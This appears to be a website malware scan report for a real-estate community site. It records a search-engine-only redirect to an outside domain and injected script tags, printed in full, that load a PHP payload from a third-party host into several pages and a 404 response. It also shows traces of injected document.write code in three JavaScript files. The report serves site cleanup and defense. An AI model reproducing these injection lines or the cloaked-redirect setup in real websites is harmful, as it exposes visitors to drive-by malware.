Malicious/Suspicious Redirects
Request | Server response | Status |
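URL: http://estatesatthomaslake.com/ (request imitating a visitor who arrives from a search engine) GET / HTTP/1.1 Host: estatesatthomaslake.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 11:51:20 GMT Location: http://reddeerhotyoga.ca/aeed.html?h=3358068 Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL returned 200 OK to the scan request listed under "Scanned pages/files", so the redirect appears to be served only when the request carries a search-engine Referer. A site owner who opens the address directly would not see it. Conditional redirects of this kind are commonly set in server configuration (for example .htaccess rewrite rules) or in server-side scripts, so those should be reviewed along with the page files.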
Scanned pages/files
Request | Server response | Status |
http://estatesatthomaslake.com/ | 200 OK Content-Length: 7827 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script> (an external script loaded from a third-party host, not from the scanned site) | ||
http://estatesatthomaslake.com/page8.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://estatesatthomaslake.com/test404page.js | 404 Not Found Content-Length: 2881 Content-Type: text/html | suspicious |
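Suspicious code found: <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732590"></script> | ||
Note: this tag was returned in the body of a 404 Not Found response for a file that does not exist, so the injection is apparently not limited to the site's stored HTML pages; the error page and anything that generates HTML on the server should be checked as well.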
http://estatesatthomaslake.com/page9.html | 200 OK Content-Length: 7351 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732588"></script> | ||
http://estatesatthomaslake.com/wpscripts/jspngfix.js | 200 OK Content-Length: 5886 Content-Type: application/javascript | malicious |
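Malicious code - confirmed by antiviruses (see below). Excerpt as displayed by the scanner, apparently cut between the start and the end of the file: document.write(''); var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "(" ); [...] pt>') /*/339810*/ The body of the excerpt is ordinary PNG-fix code; the parts that do not belong to it are the leading document.write('') and the trailing pt>') /*/339810*/, which look like remnants of an injected document.write call whose markup was stripped when the report was rendered. Antivirus reports: (none reproduced in this copy of the report)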
| ||
http://estatesatthomaslake.com/wpscripts/jsRollover.js | 200 OK Content-Length: 7254 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt as displayed by the scanner, apparently cut before the end of the file: document.write(''); rolls = new Array(); numRolls=0; function PPFindObj(n, d) { var p,i,x; if( !d ) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p); } if( !(x=d[n])&&d.all ) x=d.all[n]; for( i=0;!x&&i<d.forms.length;i++ ) x=d.forms[i][n]; for( i=0;!x&&d.layers&&i<d.layers.length;i++ ) x=PPFindObj(n,d.layers[i].document); [...] 810*/f27* Antivirus reports: (none reproduced in this copy of the report)
| ||
http://estatesatthomaslake.com/index.html | 200 OK Content-Length: 7827 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script> | ||
http://estatesatthomaslake.com/page3.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://estatesatthomaslake.com/page4.html | 200 OK Content-Length: 11142 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732584"></script> | ||
http://estatesatthomaslake.com/page8a.html | 200 OK Content-Length: 6685 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732587"></script> | ||
http://estatesatthomaslake.com/page7.html | 200 OK Content-Length: 10296 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732585"></script> | ||
http://estatesatthomaslake.com/wpscripts/jsValidation.js | 200 OK Content-Length: 6638 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt as displayed by the scanner, apparently cut before the end of the file: document.write(''); function ValidateEmail(sEmail) { var reEmail=/^(.+)@(.+)$/; var reQuotedString="(\"[^\"]*\")"; var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/; var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\]+"; var reGetString="(" + reValidCharString + "|" + reQuotedString + ")"; var reUserName=new RegExp("^" + reGetString + "(\\." + reGetString + ")*$"); var reDomain=new RegExp("^" + reValidCharString + "(\\." + reVa [...] a5f* Antivirus reports: (none reproduced in this copy of the report)
| ||
http://estatesatthomaslake.com/CCR1.pdf | 200 OK Content-Length: 300869 Content-Type: application/pdf | clean |
http://estatesatthomaslake.com/CCR2.pdf | 200 OK Content-Length: 90909 Content-Type: application/pdf | clean |
http://estatesatthomaslake.com/MINUTES 10-26-09.doc | 200 OK Content-Length: 61952 Content-Type: application/msword | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estatesatthomaslake.com
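Result: This site is not currently listed as suspicious.
Note: a "not listed" result only means the blacklist has not flagged the site; it does not contradict the malicious redirect and injected scripts reported above.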
Query: http://yandex.com/infected?l10n=en&url=http://estatesatthomaslake.com/
Result: estatesatthomaslake.com is not infected or malware details are not published yet.